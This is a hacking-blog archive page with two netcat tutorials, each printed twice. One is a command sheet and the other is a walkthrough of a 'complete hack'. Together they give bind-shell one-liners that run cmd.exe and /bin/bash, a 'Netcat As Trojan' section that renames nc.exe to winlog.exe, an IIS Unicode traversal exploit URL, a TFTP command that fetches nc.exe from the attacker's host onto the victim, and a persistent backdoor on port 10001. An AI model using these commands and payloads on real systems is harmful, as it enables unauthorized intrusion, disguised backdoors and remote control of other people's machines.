Home Archives for 2012

Kamis, 31 Mei 2012

NETCAT MANUAL | COMMANDS

    Tidak ada komentar
2012 - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul 2012, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel BackTrack, Artikel Hacking, Artikel Internet, Artikel RAT, Artikel Tools, Artikel Tricks and Tips, Artikel Tutorial, Artikel Website Hacking, Artikel Windows 7, Artikel Windows 8, Artikel Windows XP, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : NETCAT MANUAL | COMMANDS
link : NETCAT MANUAL | COMMANDS

Baca juga


2012

Hello GreenHackers...
In This Article We'll Discuss about NETCAT Commands & Use. For Those People Who Don't Know About NETCAT Must Read My Previous Post NETCAT | BEGINNER GUIDE ..


Okay So Let's Start..

Important Switches

  • -d                                             detach from console, stealth mode
  • -e prog                                     inbound program to exec [dangerous!!]
  • -g                                             source-routing hop point[s], up to 8
  • -G num                                    source-routing pointer: 4, 8, 12, ...
  • -i secs                                       delay interval for lines sent, ports scanned
  • -l                                              listen mode, for inbound connects
  • -L                                             listen harder, re-listen on socket close
  • -n                                             numeric-only IP addresses, no DNS
  • -o file                                       hex dump of traffic
  • -p port                                      local port number
  • -r                                              randomize local and remote ports
  • -s addr                                     local source address
  • -t                                              answer TELNET negotiation
  • -u                                             UDP mode
  • -v                                             verbose [use twice to be more verbose]
  • -w secs                                     timeout for connects and final net reads
  • -z                                             zero-I/O mode [used for scanning]
Netcat Connecting

Run nc in connectmode and connectto port 139
nc -p 31337 127.0.0.1139

Run nc in connectmode and connectto port 139 and give verbose display -v -v two times make more verbose
nc -v -v -p 31337 127.0.0.1 139

Run nc in connectmode and connectto port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139


Run nc in connectmode and connectto port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139


Netcat Execute

-e Executesa program if netcat is compiledwith the – DGAPING_SECURITY_HOLE.

Nc.exe is compiled to execute when -e is used.

Example

nc-l -d -p 10000 -e cmd.exe or

nc-L -d -p 10000 -e cmd.exe

This will run nc in detached mode and listen on port 10000.


Netcat Listen
Use L switch to reconnect to thesame NetCat sessions.
This way you can connect over and over to the sameNetcat process.

Example:

nc -l -p 53 -t -e cmd.exe

nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'

Netcat File Sending
To receive a file named newfile on the destination system start netcat with the following command:
nc –l –p 1234 >newfile


On the source system send a file named newfile to the destination system with the following command:

nc destinationIP 1234 < newfile

Netcat Banner Grabbing

nc –vvn hostIP 80

nc –vvn hostIP 8080

Once connected type HEAD / HTTP/1.0 [Hit enter twice]

nc -v www.website.com 80 < get.txt
Checking WEB Header.

Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket"GET / HTTP/1.0\n\n";


echo "blahblahblah" | nc hostIP 80 > default.htm

cat get.txt| nc hostIP 80


Netcat Web Banner Grabber

First File is a text file:

----begin get.txt   -----
GET
/ HTTP/1.0


HIT
ENTER IN YOUR
EDITOR

HIT
ENTER IN YOUR
EDITOR
-----   end get.txt     -----



The second file is a batch file:

-----  begin getweb.cm-----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt

-----   end getweb.cmd    -----

You run it like this: getweb.cmd www.someweb.com


Netcat Finger & Telnet

Netcat as a simplefinger client:

nc -v hostIP 79 < user.txt
The file “user.txt contains the username you are interested in.

You can also send the output to a log file.

nc -v hostIP 79 < user.txt > log.txt

Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23

Netcat Simple Server

To create a simple server

nc -l -p 1234 < file

A very simple web server

nc -L -d -p 80 < file

A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe

Netcat As Trojan

We will use –t switch to answer telnet negotiation. Netcat should be compiledwith –DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/ornc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)

Connect to your trojan using

nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp –i remoteip GET nc.exe

This Is Just Some Commands of Netcat to show the power and Versatility of Netcat. I Found This article from the web Written By Adonis a.K.a. NtWaK0..

Enjoy Friends With NETCAT.... @@@@@@@








Hello GreenHackers...
In This Article We'll Discuss about NETCAT Commands & Use. For Those People Who Don't Know About NETCAT Must Read My Previous Post NETCAT | BEGINNER GUIDE ..


Okay So Let's Start..

Important Switches

  • -d                                             detach from console, stealth mode
  • -e prog                                     inbound program to exec [dangerous!!]
  • -g                                             source-routing hop point[s], up to 8
  • -G num                                    source-routing pointer: 4, 8, 12, ...
  • -i secs                                       delay interval for lines sent, ports scanned
  • -l                                              listen mode, for inbound connects
  • -L                                             listen harder, re-listen on socket close
  • -n                                             numeric-only IP addresses, no DNS
  • -o file                                       hex dump of traffic
  • -p port                                      local port number
  • -r                                              randomize local and remote ports
  • -s addr                                     local source address
  • -t                                              answer TELNET negotiation
  • -u                                             UDP mode
  • -v                                             verbose [use twice to be more verbose]
  • -w secs                                     timeout for connects and final net reads
  • -z                                             zero-I/O mode [used for scanning]
Netcat Connecting

Run nc in connectmode and connectto port 139
nc -p 31337 127.0.0.1139

Run nc in connectmode and connectto port 139 and give verbose display -v -v two times make more verbose
nc -v -v -p 31337 127.0.0.1 139

Run nc in connectmode and connectto port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139


Run nc in connectmode and connectto port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139


Netcat Execute

-e Executesa program if netcat is compiledwith the – DGAPING_SECURITY_HOLE.

Nc.exe is compiled to execute when -e is used.

Example

nc-l -d -p 10000 -e cmd.exe or

nc-L -d -p 10000 -e cmd.exe

This will run nc in detached mode and listen on port 10000.


Netcat Listen
Use L switch to reconnect to thesame NetCat sessions.
This way you can connect over and over to the sameNetcat process.

Example:

nc -l -p 53 -t -e cmd.exe

nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'

Netcat File Sending
To receive a file named newfile on the destination system start netcat with the following command:
nc –l –p 1234 >newfile


On the source system send a file named newfile to the destination system with the following command:

nc destinationIP 1234 < newfile

Netcat Banner Grabbing

nc –vvn hostIP 80

nc –vvn hostIP 8080

Once connected type HEAD / HTTP/1.0 [Hit enter twice]

nc -v www.website.com 80 < get.txt
Checking WEB Header.

Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket"GET / HTTP/1.0\n\n";


echo "blahblahblah" | nc hostIP 80 > default.htm

cat get.txt| nc hostIP 80


Netcat Web Banner Grabber

First File is a text file:

----begin get.txt   -----
GET
/ HTTP/1.0


HIT
ENTER IN YOUR
EDITOR

HIT
ENTER IN YOUR
EDITOR
-----   end get.txt     -----



The second file is a batch file:

-----  begin getweb.cm-----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt

-----   end getweb.cmd    -----

You run it like this: getweb.cmd www.someweb.com


Netcat Finger & Telnet

Netcat as a simplefinger client:

nc -v hostIP 79 < user.txt
The file “user.txt contains the username you are interested in.

You can also send the output to a log file.

nc -v hostIP 79 < user.txt > log.txt

Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23

Netcat Simple Server

To create a simple server

nc -l -p 1234 < file

A very simple web server

nc -L -d -p 80 < file

A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe

Netcat As Trojan

We will use –t switch to answer telnet negotiation. Netcat should be compiledwith –DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/ornc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)

Connect to your trojan using

nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp –i remoteip GET nc.exe

This Is Just Some Commands of Netcat to show the power and Versatility of Netcat. I Found This article from the web Written By Adonis a.K.a. NtWaK0..

Enjoy Friends With NETCAT.... @@@@@@@








Kamis, 24 Mei 2012

NetCat | Beginner Guide

    Tidak ada komentar
2012 - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul 2012, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel RAT, Artikel Tools, Artikel Tricks and Tips, Artikel Tutorial, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : NetCat | Beginner Guide
link : NetCat | Beginner Guide

Baca juga


2012


Hello GreenHackers..
In this article we will discussed about NetCat. NetCat is also known as Swiss Army Knife..
So Let's Start...

Netcat is a utilitythat is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it essentialthat you understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port redirector, a port listenerand lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺ During this tutorial I'll demonstrate a complete hack, using Netcat only, just to point out how versatile it is.


Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target20-30". Netcat will try connecting to every port between 20 and 30 [inclusive]at the target, and will likely inform you about an FTP server, telnetserver, and mailer along the way. The -z switchprevents sending any data to a TCP connectionand very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanningit isn’t its strength. A tool such as Nmap is better suited for port scanning.


We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are open.

Banner Grabbing with Netcat


So we're interested in knowing what's runningbehind port 80 and 21. We can use Netcat to grab port banners in the following way:



So we know it’s probably a Windows 2000 machine as it's runningIIS 5.0 and Microsoft FTP Service.

Let's try to send a malformed URL which attempts to exploit the FileTraversal vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use Netcat as a backdoor. If you do not know what the Unicode File traversal exploit is, you can check the "IIS Unicode File Traversal" tutorial, or read it up on the net.
Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and execute Programs  anywhere on the attacked machine.

The point here isn't hacking IIS, but the use of NetCat as a Backdoor. Don't get distracted by the whole "Hacking into IIS" thing.


Now we've sent the URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP commands into the  malformed URL.


tftp –I 192.168.1.9 GET nc.exe


Is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe


Also take a note of your TFTP server, to see if it has successfully uploaded the  nc.exe file:




Netcat as a BackDoor


So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.
In order to act as a backdoorwe need Netcatto listen on a chosenport on the IIS server  (lets  choose  port  10001)  and  then  we  can  connect  to  this  port  from  our attacking machine…using  Netcat of course!


The command we want to give on the server looks like this:


nc -L -p 10001 -d -e cmd.exe


Here's what that command does:

nc - tells Windows to run the nc.exe file with the following arguments:

-L Tells netcat to not close and wait for connections

-p Specifies a port to listen for a connection on

-d Tells Netcat to detach from the process we want it to run.

-e Tells what program to run once the port is connected to (cmd.exe)


If we now want to convert this command for Unicode URL use, it will look like this:


http://<ExploitURL>/c+nc+-L+-p+10001+-d+-+cmd.exe




Now we will execute Netcat on the remote IIS machine:



This should have started Netcat listening on port 10001 on the IIS machine and should connect the cmd.exe process to the connection stream. From our machine we will try to connect to the Netcat on the IIS server.


We have now "Shoveled a Shell" using Netcat. We effectively have a remote command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination systemstart Netcat on the IIS

server with the following command:


nc –l –p 1234 >hack.txt


Issue a ^C on the source system and your done. Be sure to check the file to be sure it is the same size as the original.

This is what hack.txt looks like



And it's Done :)


We can see that the file hack.txt has been transferred to the target system, via port

1234.


These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing. Imagine all the wonderful possibilities of overcoming firewalls with netcat…
This article is not written by me but i think it is good for beginners
You Can Download NetCat From HERE
If you are having problems due to antivirus programs detecting this as a threat, the following version may be helpful to you. It is compiled with the -e remote execution option disabled. Download from HERE.

Enjoy NetCat....


Hello GreenHackers..
In this article we will discussed about NetCat. NetCat is also known as Swiss Army Knife..
So Let's Start...

Netcat is a utilitythat is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it essentialthat you understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port redirector, a port listenerand lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺ During this tutorial I'll demonstrate a complete hack, using Netcat only, just to point out how versatile it is.


Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target20-30". Netcat will try connecting to every port between 20 and 30 [inclusive]at the target, and will likely inform you about an FTP server, telnetserver, and mailer along the way. The -z switchprevents sending any data to a TCP connectionand very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanningit isn’t its strength. A tool such as Nmap is better suited for port scanning.


We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are open.

Banner Grabbing with Netcat


So we're interested in knowing what's runningbehind port 80 and 21. We can use Netcat to grab port banners in the following way:



So we know it’s probably a Windows 2000 machine as it's runningIIS 5.0 and Microsoft FTP Service.

Let's try to send a malformed URL which attempts to exploit the FileTraversal vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use Netcat as a backdoor. If you do not know what the Unicode File traversal exploit is, you can check the "IIS Unicode File Traversal" tutorial, or read it up on the net.
Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and execute Programs  anywhere on the attacked machine.

The point here isn't hacking IIS, but the use of NetCat as a Backdoor. Don't get distracted by the whole "Hacking into IIS" thing.


Now we've sent the URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP commands into the  malformed URL.


tftp –I 192.168.1.9 GET nc.exe


Is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe


Also take a note of your TFTP server, to see if it has successfully uploaded the  nc.exe file:




Netcat as a BackDoor


So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.
In order to act as a backdoorwe need Netcatto listen on a chosenport on the IIS server  (lets  choose  port  10001)  and  then  we  can  connect  to  this  port  from  our attacking machine…using  Netcat of course!


The command we want to give on the server looks like this:


nc -L -p 10001 -d -e cmd.exe


Here's what that command does:

nc - tells Windows to run the nc.exe file with the following arguments:

-L Tells netcat to not close and wait for connections

-p Specifies a port to listen for a connection on

-d Tells Netcat to detach from the process we want it to run.

-e Tells what program to run once the port is connected to (cmd.exe)


If we now want to convert this command for Unicode URL use, it will look like this:


http://<ExploitURL>/c+nc+-L+-p+10001+-d+-+cmd.exe




Now we will execute Netcat on the remote IIS machine:



This should have started Netcat listening on port 10001 on the IIS machine and should connect the cmd.exe process to the connection stream. From our machine we will try to connect to the Netcat on the IIS server.


We have now "Shoveled a Shell" using Netcat. We effectively have a remote command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination systemstart Netcat on the IIS

server with the following command:


nc –l –p 1234 >hack.txt


Issue a ^C on the source system and your done. Be sure to check the file to be sure it is the same size as the original.

This is what hack.txt looks like



And it's Done :)


We can see that the file hack.txt has been transferred to the target system, via port

1234.


These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing. Imagine all the wonderful possibilities of overcoming firewalls with netcat…
This article is not written by me but i think it is good for beginners
You Can Download NetCat From HERE
If you are having problems due to antivirus programs detecting this as a threat, the following version may be helpful to you. It is compiled with the -e remote execution option disabled. Download from HERE.

Enjoy NetCat....

Langganan: Postingan ( Atom )